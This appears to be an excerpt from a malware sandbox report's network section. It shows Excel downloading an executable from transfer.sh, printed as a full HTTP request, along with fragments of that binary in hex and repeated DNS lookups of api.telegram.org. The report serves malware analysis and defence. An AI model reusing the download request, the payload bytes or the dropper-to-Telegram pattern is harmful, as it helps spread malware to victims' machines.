Apr 8, 2022 12:13:38.407943010 CEST	53	50108	8.8.8.8	192.168.2.22
Apr 8, 2022 12:13:49.049876928 CEST	54723	53	192.168.2.22	8.8.8.8
Apr 8, 2022 12:13:49.069257975 CEST	53	54723	8.8.8.8	192.168.2.22
Apr 8, 2022 12:13:57.592606068 CEST	58062	53	192.168.2.22	8.8.8.8
Apr 8, 2022 12:13:57.611969948 CEST	53	58062	8.8.8.8	192.168.2.22
Apr 8, 2022 12:13:57.612806082 CEST	58062	53	192.168.2.22	8.8.8.8
Apr 8, 2022 12:13:57.632107019 CEST	53	58062	8.8.8.8	192.168.2.22
Apr 8, 2022 12:13:58.419258118 CEST	56703	53	192.168.2.22	8.8.8.8
Apr 8, 2022 12:13:58.438363075 CEST	53	56703	8.8.8.8	192.168.2.22
Apr 8, 2022 12:14:03.963527918 CEST	59241	53	192.168.2.22	8.8.8.8
Apr 8, 2022 12:14:03.982727051 CEST	53	59241	8.8.8.8	192.168.2.22
Apr 8, 2022 12:14:09.352191925 CEST	55244	53	192.168.2.22	8.8.8.8
Apr 8, 2022 12:14:09.369704962 CEST	53	55244	8.8.8.8	192.168.2.22
Apr 8, 2022 12:14:09.370682001 CEST	55244	53	192.168.2.22	8.8.8.8
Apr 8, 2022 12:14:09.387701988 CEST	53	55244	8.8.8.8	192.168.2.22
Apr 8, 2022 12:14:14.605137110 CEST	53958	53	192.168.2.22	8.8.8.8
Apr 8, 2022 12:14:14.622503042 CEST	53	53958	8.8.8.8	192.168.2.22
Apr 8, 2022 12:14:19.860070944 CEST	56020	53	192.168.2.22	8.8.8.8
Apr 8, 2022 12:14:19.877264023 CEST	53	56020	8.8.8.8	192.168.2.22
Apr 8, 2022 12:14:26.385319948 CEST	51663	53	192.168.2.22	8.8.8.8
Apr 8, 2022 12:14:26.406395912 CEST	53	51663	8.8.8.8	192.168.2.22
Apr 8, 2022 12:14:26.406893015 CEST	51663	53	192.168.2.22	8.8.8.8
Apr 8, 2022 12:14:26.426151991 CEST	53	51663	8.8.8.8	192.168.2.22
Apr 8, 2022 12:14:31.751224995 CEST	51020	53	192.168.2.22	8.8.8.8
Apr 8, 2022 12:14:31.770438910 CEST	53	51020	8.8.8.8	192.168.2.22
Apr 8, 2022 12:14:37.126740932 CEST	60622	53	192.168.2.22	8.8.8.8
Apr 8, 2022 12:14:37.145925999 CEST	53	60622	8.8.8.8	192.168.2.22
Apr 8, 2022 12:14:42.388350964 CEST	53160	53	192.168.2.22	8.8.8.8
Apr 8, 2022 12:14:42.407490015 CEST	53	53160	8.8.8.8	192.168.2.22
Apr 8, 2022 12:14:42.408715963 CEST	53160	53	192.168.2.22	8.8.8.8
Apr 8, 2022 12:14:42.427793026 CEST	53	53160	8.8.8.8	192.168.2.22
Apr 8, 2022 12:14:47.753089905 CEST	64948	53	192.168.2.22	8.8.8.8
Apr 8, 2022 12:14:47.772226095 CEST	53	64948	8.8.8.8	192.168.2.22
Apr 8, 2022 12:14:53.037276030 CEST	64281	53	192.168.2.22	8.8.8.8
Apr 8, 2022 12:14:53.056391954 CEST	53	64281	8.8.8.8	192.168.2.22
Apr 8, 2022 12:14:58.945883989 CEST	63396	53	192.168.2.22	8.8.8.8
Apr 8, 2022 12:14:58.965171099 CEST	53	63396	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Apr 8, 2022 12:12:55.384783983 CEST	192.168.2.22	8.8.8.8	0xcc6	Standard query (0)	transfer.sh	A (IP address)	IN (0x0001)
Apr 8, 2022 12:12:55.436357021 CEST	192.168.2.22	8.8.8.8	0x55a4	Standard query (0)	transfer.sh	A (IP address)	IN (0x0001)
Apr 8, 2022 12:13:09.966267109 CEST	192.168.2.22	8.8.8.8	0xa258	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)
Apr 8, 2022 12:13:12.028687954 CEST	192.168.2.22	8.8.8.8	0xca1d	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)
Apr 8, 2022 12:13:16.225281000 CEST	192.168.2.22	8.8.8.8	0x2827	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)
Apr 8, 2022 12:13:21.895610094 CEST	192.168.2.22	8.8.8.8	0x3873	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)
Apr 8, 2022 12:13:29.551314116 CEST	192.168.2.22	8.8.8.8	0xe07d	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)
Apr 8, 2022 12:13:38.388186932 CEST	192.168.2.22	8.8.8.8	0x55b2	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)
Apr 8, 2022 12:13:49.049876928 CEST	192.168.2.22	8.8.8.8	0xd6a6	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)
Apr 8, 2022 12:13:57.592606068 CEST	192.168.2.22	8.8.8.8	0x2f46	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)
Apr 8, 2022 12:13:57.612806082 CEST	192.168.2.22	8.8.8.8	0x2f46	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)
Apr 8, 2022 12:13:58.419258118 CEST	192.168.2.22	8.8.8.8	0x834d	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)
Apr 8, 2022 12:14:03.963527918 CEST	192.168.2.22	8.8.8.8	0xcf1a	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)
Apr 8, 2022 12:14:09.352191925 CEST	192.168.2.22	8.8.8.8	0x9cbb	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)
Apr 8, 2022 12:14:09.370682001 CEST	192.168.2.22	8.8.8.8	0x9cbb	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)
Apr 8, 2022 12:14:14.605137110 CEST	192.168.2.22	8.8.8.8	0xd6de	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)
Apr 8, 2022 12:14:19.860070944 CEST	192.168.2.22	8.8.8.8	0xd323	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)
Apr 8, 2022 12:14:26.385319948 CEST	192.168.2.22	8.8.8.8	0xd335	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)
Apr 8, 2022 12:14:26.406893015 CEST	192.168.2.22	8.8.8.8	0xd335	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)
Apr 8, 2022 12:14:31.751224995 CEST	192.168.2.22	8.8.8.8	0xe2a3	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)
Apr 8, 2022 12:14:37.126740932 CEST	192.168.2.22	8.8.8.8	0x2305	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)
Apr 8, 2022 12:14:42.388350964 CEST	192.168.2.22	8.8.8.8	0x566	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)
Apr 8, 2022 12:14:42.408715963 CEST	192.168.2.22	8.8.8.8	0x566	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)
Apr 8, 2022 12:14:47.753089905 CEST	192.168.2.22	8.8.8.8	0x5cd6	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)
Apr 8, 2022 12:14:53.037276030 CEST	192.168.2.22	8.8.8.8	0xe143	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)
Apr 8, 2022 12:14:58.945883989 CEST	192.168.2.22	8.8.8.8	0xd94f	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Apr 8, 2022 12:12:55.401964903 CEST	8.8.8.8	192.168.2.22	0xcc6	No error (0)	transfer.sh	144.76.136.153	A (IP address)	IN (0x0001)
Apr 8, 2022 12:12:55.455504894 CEST	8.8.8.8	192.168.2.22	0x55a4	No error (0)	transfer.sh	144.76.136.153	A (IP address)	IN (0x0001)
Apr 8, 2022 12:13:09.986238003 CEST	8.8.8.8	192.168.2.22	0xa258	No error (0)	api.telegram.org	149.154.167.220	A (IP address)	IN (0x0001)
Apr 8, 2022 12:13:12.047924042 CEST	8.8.8.8	192.168.2.22	0xca1d	No error (0)	api.telegram.org	149.154.167.220	A (IP address)	IN (0x0001)
Apr 8, 2022 12:13:16.244759083 CEST	8.8.8.8	192.168.2.22	0x2827	No error (0)	api.telegram.org	149.154.167.220	A (IP address)	IN (0x0001)
Apr 8, 2022 12:13:21.913070917 CEST	8.8.8.8	192.168.2.22	0x3873	No error (0)	api.telegram.org	149.154.167.220	A (IP address)	IN (0x0001)
Apr 8, 2022 12:13:29.570374012 CEST	8.8.8.8	192.168.2.22	0xe07d	No error (0)	api.telegram.org	149.154.167.220	A (IP address)	IN (0x0001)
Apr 8, 2022 12:13:38.407943010 CEST	8.8.8.8	192.168.2.22	0x55b2	No error (0)	api.telegram.org	149.154.167.220	A (IP address)	IN (0x0001)
Apr 8, 2022 12:13:49.069257975 CEST	8.8.8.8	192.168.2.22	0xd6a6	No error (0)	api.telegram.org	149.154.167.220	A (IP address)	IN (0x0001)
Apr 8, 2022 12:13:57.611969948 CEST	8.8.8.8	192.168.2.22	0x2f46	No error (0)	api.telegram.org	149.154.167.220	A (IP address)	IN (0x0001)
Apr 8, 2022 12:13:57.632107019 CEST	8.8.8.8	192.168.2.22	0x2f46	No error (0)	api.telegram.org	149.154.167.220	A (IP address)	IN (0x0001)
Apr 8, 2022 12:13:58.438363075 CEST	8.8.8.8	192.168.2.22	0x834d	No error (0)	api.telegram.org	149.154.167.220	A (IP address)	IN (0x0001)
Apr 8, 2022 12:14:03.982727051 CEST	8.8.8.8	192.168.2.22	0xcf1a	No error (0)	api.telegram.org	149.154.167.220	A (IP address)	IN (0x0001)
Apr 8, 2022 12:14:09.369704962 CEST	8.8.8.8	192.168.2.22	0x9cbb	No error (0)	api.telegram.org	149.154.167.220	A (IP address)	IN (0x0001)
Apr 8, 2022 12:14:09.387701988 CEST	8.8.8.8	192.168.2.22	0x9cbb	No error (0)	api.telegram.org	149.154.167.220	A (IP address)	IN (0x0001)
Apr 8, 2022 12:14:14.622503042 CEST	8.8.8.8	192.168.2.22	0xd6de	No error (0)	api.telegram.org	149.154.167.220	A (IP address)	IN (0x0001)
Apr 8, 2022 12:14:19.877264023 CEST	8.8.8.8	192.168.2.22	0xd323	No error (0)	api.telegram.org	149.154.167.220	A (IP address)	IN (0x0001)
Apr 8, 2022 12:14:26.406395912 CEST	8.8.8.8	192.168.2.22	0xd335	No error (0)	api.telegram.org	149.154.167.220	A (IP address)	IN (0x0001)
Apr 8, 2022 12:14:26.426151991 CEST	8.8.8.8	192.168.2.22	0xd335	No error (0)	api.telegram.org	149.154.167.220	A (IP address)	IN (0x0001)
Apr 8, 2022 12:14:31.770438910 CEST	8.8.8.8	192.168.2.22	0xe2a3	No error (0)	api.telegram.org	149.154.167.220	A (IP address)	IN (0x0001)
Apr 8, 2022 12:14:37.145925999 CEST	8.8.8.8	192.168.2.22	0x2305	No error (0)	api.telegram.org	149.154.167.220	A (IP address)	IN (0x0001)
Apr 8, 2022 12:14:42.407490015 CEST	8.8.8.8	192.168.2.22	0x566	No error (0)	api.telegram.org	149.154.167.220	A (IP address)	IN (0x0001)
Apr 8, 2022 12:14:42.427793026 CEST	8.8.8.8	192.168.2.22	0x566	No error (0)	api.telegram.org	149.154.167.220	A (IP address)	IN (0x0001)
Apr 8, 2022 12:14:47.772226095 CEST	8.8.8.8	192.168.2.22	0x5cd6	No error (0)	api.telegram.org	149.154.167.220	A (IP address)	IN (0x0001)
Apr 8, 2022 12:14:53.056391954 CEST	8.8.8.8	192.168.2.22	0xe143	No error (0)	api.telegram.org	149.154.167.220	A (IP address)	IN (0x0001)
Apr 8, 2022 12:14:58.965171099 CEST	8.8.8.8	192.168.2.22	0xd94f	No error (0)	api.telegram.org	149.154.167.220	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

transfer.sh

api.telegram.org

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49171	144.76.136.153	443	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Timestamp	kBytes transferred	Direction	Data
2022-04-08 10:12:55 UTC	0	OUT	GET /Uv5XFY/0000.LPCD2022.exe HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Host: transfer.sh
2022-04-08 10:12:56 UTC	0	IN	HTTP/1.1 200 OK Server: nginx/1.14.2 Date: Fri, 08 Apr 2022 10:12:56 GMT Content-Type: application/x-ms-dos-executable Content-Length: 546816 Connection: close Content-Disposition: attachment; filename="0000.LPCD2022.exe" Retry-After: Fri, 08 Apr 2022 12:13:01 GMT X-Made-With: <3 by DutchCoders X-Ratelimit-Key: 127.0.0.1,84.17.52.18,84.17.52.18 X-Ratelimit-Limit: 10 X-Ratelimit-Rate: 600 X-Ratelimit-Remaining: 9 X-Ratelimit-Reset: 1649412781 X-Remaining-Days: n/a X-Remaining-Downloads: n/a X-Served-By: Proudly served by DutchCoders Strict-Transport-Security: max-age=63072000
2022-04-08 10:12:56 UTC	0	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 22 8a 4e 62 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 30 00 00 32 08 00 00 24 00 00 00 00 00 00 7e 50 08 00 00 20 00 00 00 60 08 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 08 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL"Nb02$~P `@ @
2022-04-08 10:12:56 UTC	16	IN	Data Raw: b3 04 00 00 8d 00 00 00 38 ae 04 00 00 11 0a 13 0b 38 bd 00 00 00 11 00 02 7b c6 00 00 04 6f 39 01 00 06 23 00 00 00 00 00 00 f0 3f 02 7b c6 00 00 04 6f 3c 01 00 06 23 00 00 00 00 00 00 10 40 5b 59 23 00 00 00 00 00 00 08 40 02 7b c6 00 00 04 28 2f 01 00 06 28 26 01 00 06 5a 23 00 00 00 00 00 00 50 40 5b 59 23 00 00 00 00 00 00 14 40 02 7b c6 00 00 04 6f 3c 01 00 06 28 27 01 00 06 5a 23 00 00 00 00 00 00 70 40 5b 59 5a 5b 13 01 38 c9 03 00 00 11 03 28 30 01 00 06 28 26 01 00 06 13 06 38 16 04 00 00 11 04 11 03 28 96 00 00 0a 28 26 01 00 06 5a 13 0c 20 01 00 00 00 28 2c 01 00 06 39 33 ff ff ff 26 20 01 00 00 00 38 28 ff ff ff 38 e3 03 00 00 20 00 00 00 00 28 2c 01 00 06 39 14 ff ff ff 26 38 0a ff ff ff 73 16 01 00 06 25 02 28 25 01 00 06 23 00 00 00 00 00 Data Ascii: 88{o9#?{o<#@[Y#@{(/(&Z#P@[Y#@{o<('Z#p@[YZ[8(0(&8((&Z (,93& 8(8 (,9&8s%(%#
2022-04-08 10:12:56 UTC	32	IN	Data Raw: 20 01 00 0a 20 0c 00 00 00 38 0a fb ff ff 00 02 7b 09 01 00 04 6f b9 00 00 0a 38 71 fd ff ff 00 02 28 af 00 00 0a 02 7b 09 01 00 04 6f bb 00 00 0a 38 c7 fd ff ff 00 02 7b 07 01 00 04 1f 23 1f 14 73 b3 00 00 0a 6f 30 01 00 0a 38 dc fc ff ff 02 73 3e 01 00 0a 7d 0f 01 00 04 38 a7 fe ff ff 00 02 7b 0f 01 00 04 72 01 00 00 70 6f 39 01 00 0a 38 bb fe ff ff 00 02 16 28 e9 01 00 06 38 5a 02 00 00 00 02 7b 0a 01 00 04 1a 1f 16 73 ac 00 00 0a 6f 42 01 00 0a 38 e1 00 00 00 00 02 7b 0c 01 00 04 72 9d 07 00 70 6f 38 01 00 0a 38 1d fb ff ff 00 02 7b 0a 01 00 04 17 6f 43 01 00 0a 38 92 fb ff ff 02 73 3e 01 00 0a 7d 0d 01 00 04 38 56 fd ff ff 00 02 7b 07 01 00 04 72 b9 07 00 70 28 e3 01 00 06 38 4c ff ff ff 00 02 02 7b 06 01 00 04 28 44 01 00 0a 20 0f 00 00 00 28 d3 01 Data Ascii: 8{o8q({o8{#so08s>}8{rpo98(8Z{soB8{rpo88{oC8s>}8V{rp(8L{(D (
2022-04-08 10:12:56 UTC	48	IN	Data Raw: 51 00 56 00 c4 05 8c 00 56 00 0f 00 94 00 56 00 0f 00 94 00 c1 08 01 06 8c 00 e3 07 97 04 94 00 c9 08 0f 00 94 00 e3 07 97 04 94 00 eb 07 a9 04 79 01 56 00 4f 06 71 01 56 00 57 06 0c 00 56 00 0f 00 0c 00 e3 07 97 04 71 01 26 09 a9 04 89 01 3b 09 0f 00 51 00 56 00 89 06 9c 00 67 08 6f 05 71 01 62 09 99 06 a4 00 84 06 a8 02 51 00 6c 09 a6 06 ac 00 56 00 e9 02 11 01 c8 06 cd 02 51 00 72 09 c0 06 99 01 81 08 86 05 b4 00 73 08 cd 06 51 00 8c 09 a9 04 51 00 72 09 1c 07 51 00 97 09 22 07 bc 00 56 00 0f 00 c4 00 e3 07 97 04 bc 00 eb 07 a9 04 44 00 84 06 a8 02 bc 00 84 06 a8 02 bc 00 e3 07 97 04 c4 00 84 06 a8 02 44 00 eb 07 a9 04 6c 00 a1 09 86 05 c4 00 56 00 0f 00 a1 01 56 00 67 00 6c 00 b8 09 6f 05 51 00 ce 09 4b 07 a9 01 56 00 67 00 cc 00 eb 07 a9 04 14 00 e3 Data Ascii: QVVVyVOqVWVq&;QVgoqbQlVQrsQQrQ"VDDlVVgloQKVg
2022-04-08 10:12:56 UTC	64	IN	Data Raw: 12 80 88 06 20 01 01 12 80 88 09 20 00 15 12 80 91 01 12 10 0a 20 01 01 15 12 80 91 01 12 10 05 20 01 01 12 30 0c 07 08 08 12 10 12 6c 08 0e 02 08 02 07 15 12 80 91 01 12 48 05 20 01 13 00 08 07 15 12 80 91 01 12 64 07 15 12 80 91 01 12 5c 04 00 01 08 0e 03 20 00 0e 05 00 02 02 0e 0e 0c 10 01 01 1e 00 15 12 80 8d 01 1e 00 04 0a 01 12 74 09 15 12 80 95 02 12 64 12 10 05 20 02 01 1c 18 1a 10 02 02 15 12 80 8d 01 1e 01 15 12 80 8d 01 1e 00 15 12 80 95 02 1e 00 1e 01 06 0a 02 12 64 12 10 11 10 01 01 15 12 80 91 01 1e 00 15 12 80 8d 01 1e 00 04 0a 01 12 10 08 15 12 80 95 02 12 10 02 14 10 01 02 1e 00 15 12 80 8d 01 1e 00 15 12 80 95 02 1e 00 02 0d 10 01 01 15 12 80 8d 01 1e 00 12 80 9d 04 0a 01 12 6c 08 15 12 80 95 02 12 6c 02 08 15 12 80 95 02 12 44 02 04 0a Data Ascii: 0lH d\ td dllD
2022-04-08 10:12:56 UTC	80	IN	Data Raw: e1 e9 b5 57 5a 29 6c ab 2e ab 5a 2f 25 20 38 b3 b7 a6 c9 8c a3 e6 67 0d a9 ac 08 79 92 99 45 d6 88 d9 a2 27 3d ac 9b ec 3d 6e 10 02 1d 54 5b 5c f6 1d 5b f5 56 42 b6 bc 1a 2f 58 2f fb 62 5d c0 d3 0d 08 60 45 b2 7a f5 6a b6 1a ae 83 58 c4 f2 f0 a6 9d 49 da c8 5e 52 07 cd 5c 11 04 08 7a 5f b0 b8 13 6d c4 75 d8 87 a5 a2 25 89 a2 37 15 c6 b9 1c 04 08 68 b8 e4 52 0a 49 d0 37 c4 8d 8c 17 e2 2e e4 05 1b 55 b0 99 ed c5 dd 4a 53 59 81 ba c9 3d 30 90 91 d1 34 6e 10 02 1d 54 5b 5c f6 1d 5b f5 56 42 b6 bc 1a ff 3c 3c 8a 5c 3c c1 03 0a 06 79 07 a6 e9 65 6f ab aa 4e 97 3d d7 16 88 8c 90 47 36 cb 6e 7e 0c 69 32 2a 66 1d 6e 4f 42 b7 8a a5 64 38 fb e3 85 b3 32 cd 7e fd 15 b9 f1 52 60 28 53 6a 66 4d 94 53 c3 26 35 31 44 0e c6 2a 5a 59 0f 0c d9 68 b9 a1 62 45 59 b7 9c f8 c1 Data Ascii: WZ)l.Z/% 8gyE'==nT[\[VB/X/b]`EzjXI^R\z_mu%7hRI7.UJSY=04nT[\[VB<<\<yeoN=G6n~i2fnOBd82~R`(SjfMS&51DZYhbEY
2022-04-08 10:12:56 UTC	96	IN	Data Raw: 08 da 1e 9a 9a e4 f6 e3 dd fa 14 5e d0 6f 47 f9 86 b2 53 22 85 47 a6 a2 e5 97 f4 bf 59 6b 4c ea 8b 59 bd c6 b5 e0 c6 dc d6 af c1 4a 5a 3b 82 c2 ac a6 1d 0d 99 13 61 70 7e 1e 7f 46 88 d3 db ef ab e2 76 c7 b7 a5 69 6b 47 eb 98 7d fc b1 46 a8 b6 3a f1 97 b1 d7 bd be c9 ba bc 2f 17 5e ef 7c ed ef ab 51 8b ed 8b 76 13 2c 6a 7a bd f6 e1 ca f8 83 1f 2c e2 e4 b7 cf d4 53 08 2e 1d d7 f0 4a b9 67 ee a1 ac 87 ba 11 33 b8 92 79 f5 06 0f 16 2a 7d b3 b9 68 b6 e1 85 8b eb a1 95 f6 8f eb d3 55 24 67 32 f8 7d 92 9b b9 23 a7 ba 42 ea 8f d4 6a 2f d6 cf 9e 4d 7b fe c1 e5 cd ef 5f 2d c7 c3 a5 fb 9e bc f8 b9 fe f6 da bd 15 35 06 2b f3 57 2c 7b 89 3f 38 20 d5 88 a0 32 c6 f9 8e 7f b7 71 3b 63 d4 fe cd b9 bb e1 ee 11 43 0f 4f 9e 72 90 4e 71 18 9d 07 87 73 8c a2 ca 5e 3c fe c4 71 Data Ascii: ^oGS"GYkLYJZ;ap~FvikG}F:/^\|Qv,jz,S.Jg3y*}hU$g2}#Bj/M{_-5+W,{?8 2q;cCOrNqs^<q
2022-04-08 10:12:56 UTC	112	IN	Data Raw: 4d 2f cd c7 4d 2f da 47 b3 12 aa 38 69 ab d3 42 59 c6 fe 20 22 8a e4 e0 1b ee 60 16 aa a5 2b 8c f7 2e 76 8a 28 84 a6 96 9a 8c c9 91 b0 ba d2 d8 3d bb 86 3f c2 dd b6 4d 02 f8 62 ea 68 45 45 8d 04 b8 ff 71 59 9f e4 9f 8d 65 4f 1f 72 a1 7f 5d b5 e4 9a 5b bf cd 7e 45 89 34 ad f8 e3 cc 49 2b ae 76 8e 1f 19 ff e4 b0 3d 57 f9 fe a2 b0 8f 2f 76 29 f7 1d cc 2d 0a 2a 5e 9d 4f 7f ec 5a 19 9f ac 7a cb 72 34 84 a2 ed 5e e7 98 69 2d 8e 12 ad d9 dc 5f bc 66 e5 b7 94 87 13 4c aa ab 2f dc eb 5f 91 e7 ff 29 82 65 2d bb 17 fa 71 b6 bd 02 47 fe 23 d7 61 7b 98 47 1b c7 dc 2f c9 9d f6 27 6a 1e 6b e4 ca db 74 2c 82 61 7c 79 86 c6 b8 d7 1d eb 7c 57 8f 3e 5f b1 55 cd ec 42 e0 15 d1 14 df a7 8d db 19 ed 1e 39 95 cb 57 4c ac d7 d9 d8 5e d2 73 62 7e 20 dc 73 26 a6 49 6a d9 bb 7c 1e Data Ascii: M/M/G8iBY "`+.v(=?MbhEEqYeOr][~E4I+v=W/v)-*^OZzr4^i-_fL/_)e-qG#a{G/'jkt,a\|y\|W>_UB9WL^sb~ s&Ij\|
2022-04-08 10:12:56 UTC	128	IN	Data Raw: 0b d8 32 e8 1a ff 6d 76 39 09 28 32 a4 32 ff 02 f3 b4 97 c0 3b 95 4a ae 51 19 66 c6 47 ac 2f 0d f2 73 b6 ad 95 7d c3 15 f7 4e 03 87 2c 49 56 6a d9 fa d9 54 83 f3 e9 62 06 b5 06 46 99 e7 93 f7 1a 9c 4f 7d 62 50 ab 9d 96 79 3e f6 b5 c1 f9 f8 64 83 5a 95 59 c0 fd df 5e 0d ec 94 38 ee c6 92 da 10 3f ee 15 c0 03 4a 72 fe b4 80 1c 07 91 08 5b 15 3f 3b 65 7f cc 26 3a 18 84 3b 6a 06 ab ab 73 f3 a5 22 55 fc 19 12 01 6a 16 8e 32 e5 ce d1 da 3e 31 96 76 06 a6 41 15 b1 58 65 20 08 55 c2 d4 2d a9 72 6c 20 1b 12 eb a5 66 2b 29 eb 1a 97 6d 13 a2 2d 17 25 27 31 0f d9 42 f2 9c 58 3c a2 f9 d4 f4 34 dd f9 58 a9 35 b3 4c 87 1d c9 f1 fd 6b 61 53 f6 7a 1a 58 a4 a4 fc 0c 6e 93 73 ca a4 44 85 1e ee 95 bb a3 7b c6 f7 ce 6d a6 78 86 95 a1 75 e5 d9 73 9d 23 31 9e e3 42 0d c5 7f f4 Data Ascii: 2mv9(22;JQfG/s}N,IVjTbFO}bPy>dZY^8?Jr[?;e&:;js"Uj2>1vAXe U-rl f+)m-%'1BX<4X5LkaSzXnsD{mxus#1B
2022-04-08 10:12:56 UTC	144	IN	Data Raw: 0d e0 9b 42 f9 ee 10 70 5b 00 95 06 af dd 15 60 1c 38 bd 8e 6a a4 59 46 ad f5 ff 65 bb 3c eb e0 92 18 45 1e 13 6b 53 a0 70 30 0e 98 e2 dc e4 b9 f0 8e 92 5a 5d 93 99 ae 95 81 e0 91 20 d5 70 23 0d a9 35 50 53 cb 0f 70 c2 68 8c 9a 5d 76 c1 31 9c 64 06 7a ff bf 39 93 a1 31 88 96 fd 3f aa 06 36 1c 3f 60 94 71 07 99 62 21 3c 14 9d a8 49 10 ad e4 09 61 54 59 4d 12 c3 c9 ce 54 ce 2a 36 c1 44 41 5e 2d 41 d4 49 cd 8a 98 90 4b 8c f5 75 91 b5 b5 d6 50 37 a8 60 18 84 49 5b c5 3b 9b ba 48 8b 73 ca d5 98 40 42 26 48 02 20 5b 48 93 3c 33 63 4c 49 59 d5 d2 35 9c a9 1e a2 ad 84 05 c3 3f 5c b6 1c 19 b8 c0 bf 37 1e 93 57 00 b0 de 14 57 90 d2 5d 50 42 9d a2 5b fa 95 78 15 f0 0a 8a 74 f0 8b f4 66 7d 51 a7 70 e3 f4 13 b7 1e 4c fd f6 d2 55 3e 46 df 73 85 7f e6 f0 9f ac 19 71 4e Data Ascii: Bp[`8jYFe<EkSp0Z] p#5PSph]v1dz91?6?`qb!<IaTYMT*6DA^-AIKuP7`I[;Hs@B&H [H<3cLIY5?\7WW]PB[xtf}QpLU>FsqN
2022-04-08 10:12:56 UTC	160	IN	Data Raw: 25 32 d6 82 4d 36 e1 44 e0 cb 4b c2 8c e1 0d fc 4f b3 4b 29 33 1e b2 85 64 00 f3 04 c0 6d 12 fc f0 a0 39 1e e3 44 c1 65 f5 5a 0d e0 ec f2 c6 78 62 af 00 59 52 01 f0 e6 86 63 bc de 3a 40 fe 35 0d 78 bf cd 30 de c9 47 80 3c 0e c7 5f db 31 5e 1b 19 c8 fe d3 81 e2 3f 69 07 7f 73 6c ac 88 cb f8 5b f6 1d 24 73 42 31 05 9a bc 88 8c a3 f3 3c a7 a0 82 50 0d 9a 79 70 26 15 73 b6 02 5e 51 8e fe 52 8a 09 ae e1 da ff 0f 65 ef 01 d5 d4 f7 75 8b 22 2d f4 de 5b 94 22 3d f4 1a 92 23 48 e8 bd b7 d0 3b 21 74 48 48 76 22 07 c5 8e bd 8b 8a 28 56 6c 80 8a 35 28 2a 16 14 45 c5 42 11 51 51 b1 80 a8 88 8a bc bd f1 f7 fb 7f df bd 77 dc ef bd e7 70 64 6c e3 c9 ce 3e 07 ce dc 73 ad 33 d7 5c e6 ce 18 db 21 59 52 27 2e d0 41 d9 2c 28 31 d3 85 13 e8 1c 2f 0a 44 35 54 d8 e1 c6 f9 b2 62 Data Ascii: %2M6DKOK)3dm9DeZxbYRc:@5x0G<_1^?isl[$sB1<Pyp&s^QReu"-["=#H;!tHHv"(Vl5(*EBQQwpdl>s3\!YR'.A,(1/D5Tb
2022-04-08 10:12:56 UTC	176	IN	Data Raw: af c9 ac 87 83 a0 de 13 4f 4d b1 77 cc d3 ac 98 26 25 33 93 01 90 6b 86 93 67 62 16 74 00 ca 91 aa 81 8b 5a fe a4 b7 d1 b0 57 80 84 33 46 69 a0 09 55 a6 d5 11 e2 cf 62 b6 4a f0 fa 53 0d 01 96 2b 2a c0 97 43 bc c6 e4 e0 a6 52 d6 70 5c 87 1e 80 8a 29 34 f1 f7 36 d5 86 34 d0 02 e7 e9 44 a9 06 78 71 ff 51 35 20 0d 6f 09 cb c6 85 ab 43 07 77 e1 fb df 01 66 0f e9 36 13 2e 2c b3 03 b8 49 73 e7 b2 f8 16 a9 a7 40 3a 97 8d 19 b9 cc 03 06 a5 a7 b8 5f b8 cd d4 dd 98 1f 97 c5 ab e1 f7 94 18 50 12 a8 64 5e 49 fa 43 9e 41 e6 5a 37 75 fd f7 3c df d4 43 bc a9 84 7e b7 6d da ba bc b4 b8 6c f6 af 88 34 f2 5f c0 fd eb d5 f0 2f f8 6a f0 98 45 df 8a 34 42 b7 02 3e 57 c5 d8 3f 58 8e 25 01 ca d5 9c 89 6a 6e e5 89 5a 51 12 96 98 02 49 d1 4e d2 bf 40 32 40 54 a3 4c d6 1c e8 c8 c7 Data Ascii: 